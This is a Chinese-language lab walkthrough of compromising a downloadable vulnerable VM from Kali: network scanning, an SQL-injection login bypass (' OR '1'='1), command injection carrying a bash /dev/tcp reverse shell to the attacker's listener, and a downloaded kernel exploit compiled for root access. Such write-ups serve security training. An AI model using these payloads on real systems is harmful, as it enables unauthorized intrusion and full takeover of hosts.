kali对未知web server透测试1

靶机渗透

主机 IP
kali 192.168.101.62
靶机 未知

靶机探测

靶机下载:https://pan.baidu.com/s/1P8s-ntf05dRSWOg_LrxD_Q
提取码:1234
1.打开靶机
kali对未知web server透测试1_第1张图片
选择我已移动该虚拟机
kali对未知web server透测试1_第2张图片

  1. 打开kali进行信息收集
    netdiscover -i eth1 -r 192.168.101.0/24 #探测主机

kali对未知web server透测试1_第3张图片
因为这里使用的桥接网卡所以可以探测当前路由器连接的所有设备。
这里看名字可以得到虚拟机ip:192.168.101.63
使用nmap探测发现开放80
kali对未知web server透测试1_第4张图片

  1. 访问web界面
    kali对未知web server透测试1_第5张图片
    发现登录框,使用弱密码登录失败,使用sql注入。
    万能密码
账号:随便
密码:' OR '1'='1

进入下个界面
命令执行漏洞
kali对未知web server透测试1_第6张图片

这里应该是命令执行漏洞
kali对未知web server透测试1_第7张图片
命令执行漏洞是利用Linux一行命令执行多条命令这一特点,使用分号";"、连字符"&、&&"、竖线"||"连接两条命令进行shell反弹。
我们这里尝试使用命令进行查看主机密码
kali对未知web server透测试1_第8张图片
查看用户配置文件
kali对未知web server透测试1_第9张图片
尝试查看密码
kali对未知web server透测试1_第10张图片

权限提升

发现权限不够
这里我们利用漏洞反弹shell
使用kali中的nc工具开一个监听端口
nc -lvp 5555
kali对未知web server透测试1_第11张图片

在web界面执行
127.0.0.1;bash -i >& /dev/tcp/192.168.101.62/5555 0>&1

kali对未知web server透测试1_第12张图片

kali对未知web server透测试1_第13张图片
这里成功反弹shell
kali对未知web server透测试1_第14张图片
执行命令查看当前Linux版本,到网上寻找提权脚本。
linux 2.6.9-55.el i686 exploit
kali对未知web server透测试1_第15张图片

kali对未知web server透测试1_第16张图片
在kali中新建一个shell
开启apache2并把提权脚本放入web目录下
kali对未知web server透测试1_第17张图片
然后使用反弹的shell进行下载提权脚本到靶机内

因为tmp目录权限较高,进入tmp目录下载提权脚本。kali对未知web server透测试1_第18张图片
进行编译提权
kali对未知web server透测试1_第19张图片
修改root密码实现ssh登录
kali对未知web server透测试1_第20张图片
使用ssh工具连接
kali对未知web server透测试1_第21张图片
kali对未知web server透测试1_第22张图片
连接成功,成功渗透。

你可能感兴趣的:(kali,web,渗透,centos,shell,安全,mysql,linux)